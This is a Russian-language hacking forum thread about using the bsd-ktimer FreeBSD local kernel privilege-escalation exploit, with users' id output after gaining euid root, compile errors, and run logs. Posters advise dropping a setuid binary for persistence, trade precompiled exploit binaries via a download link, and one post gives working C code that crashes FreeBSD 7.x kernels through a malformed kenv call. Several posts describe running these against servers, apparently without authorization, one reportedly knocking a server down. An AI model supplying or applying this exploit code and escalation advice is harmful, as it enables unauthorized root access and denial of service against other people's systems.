Доброе времени суток

попроборвал протестить новый эксплоит bsd-ktimer.c
(http://www.securitylab.ru/poc/extra/370448.php)

было:uid=80(www) gid=80(www) groups=80(www)

стало:uid=80(www) gid=80(www) euid=0(root) groups=80(www)

возможно ли подняться дальше до (uid=0(root) gid=0(root)) если да, то как?

Доброе времени суток

попроборвал протестить новый эксплоит bsd-ktimer.c
(http://www.securitylab.ru/poc/extra/370448.php)

было:uid=80(www) gid=80(www) groups=80(www)

стало:uid=80(www) gid=80(www) euid=0(root) groups=80(www)

возможно ли подняться дальше до (uid=0(root) gid=0(root)) если да, то как?

хотя впринципе есть доступ на чтение и запись файлов с правами 600

k3rn3l, насколько я понимаю. У тебя уже есть рут.
А за ссылку спасибо.

k3rn3l, насколько я понимаю. У тебя уже есть рут.
А за ссылку спасибо.

ага, я уже и сам понял, что есть права рута, просто привычно лицезреть: uid=0(root) gid=0(root), а не

uid=80(www) gid=80(www) euid=0(root) groups=80(www)

смущают как то: uid=80(www) gid=80(www)

я когда рутал этим сплоитом, тоже засмущался =)))
льешь суидник и сразу привычно становится =)

льешь суидник и сразу привычно становится =)

если мона на этом месте поподробнее, как? что?

Подскажите, этот сплоит пойдёт под FreeBSD 6.2-RELEASE-p8?
Если нет, то скажите какой лучше эксплоит юзать под эту систему?

r0mka, читай внимательн:
Новый эксплоит в FreeBSD >= 7.0
сочетание знаков > и = , означает : больше или равно, тоесть подвержены FreeBSD версии 7.0 и больше.
для 6,2 насколько я знаю - нет ничего. Так что только сервисы бажные, такие как sendmail ;-)

Подскажите, этот сплоит пойдёт под FreeBSD 6.2-RELEASE-p8?
Если нет, то скажите какой лучше эксплоит юзать под эту систему?

вот посмотри для ентих версий:
FreeBSD 6.3, 6.4, 7.0
(http://www.securitylab.ru/vulnerability/365343.php)

подскажите плиз, есть ли уже скомпилированный сплойт, скомпилить на том серваке не получается, команда gcc не выполняется, помогите плиз, я в асе 433397167

подскажите плиз, есть ли уже скомпилированный сплойт, скомпилить на том серваке не получается, команда gcc не выполняется, помогите плиз, я в асе 433397167

Скомпилируй у себя, не вижу проблемы.

Подскажите что делать, фряха 7.1, юзаю данный сплойт который в первом посте, вылетают ошибки при компиляции:

gcc 3.c -o xxx
3.c: In function 'main':
3.c:73: warning: cast from pointer to integer of different size
3.c:73: warning: cast from pointer to integer of different size
3.c:85: warning: cast from pointer to integer of different size
3.c:85: warning: cast from pointer to integer of different size
3.c:115: warning: cast from pointer to integer of different size
3.c:118: warning: cast from pointer to integer of different size
3.c:128:2: warning: no newline at end of file
/var/tmp//ccXPFf6W.s: Assembler messages:
/var/tmp//ccXPFf6W.s:12: Error: Incorrect register `%rax' used with `l' suffix


P.s. есть ли у кого скомпилированный бинарник?)

P.s. есть ли у кого скомпилированный бинарник?)
Получите, расспишитесь
http://letitbit.net/download/1961.c133f93f45bdc482dae143f79/bsd7.html

ВНИМАНИЕ на серве работает хреново рута не дал но сервак убил )))

Цель: FreeBSD 7.x
Воздействие: Отказ в обслуживании

/* FreeBSD 7.x Kernel panic when dumping environment, hacker4all*/
#include <kenv.h>
#include <stdio.h>
void main(){
kenv(KENV_DUMP,NULL,9090909090,9090909090);
}

результат был таким чем рут ))

не то ты че то суешь ))))

ыы понимаю но 7.1 была... она ДОЛЖНА была пройти... по любому...

ps: сообщения выше было удаленно.

дабы не создавать новую тему у меня вопрос по данному експлоиту. скомпилировал, пытаюсь запустить. он запустился и вот что пишет

./test
FreeBSD local kernel root exploit
by: christer/mu-b
http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!

* allocated pointer page: 0x00000000 -> 0x08000000 [134217728-bytes]
* allocated itimer struct: 0x20000000 -> 0x200000DC [220-bytes]
* filling pointer page... ./test: failed to lookup posix_clocks
done


права у меня вот: uid=80(www) gid=80(www) groups=80(www)

Ty3uK так же фигня на FreeBSD 7.0-RELEASE, сервак выпадает( подскажет может кто? критерии есть получается(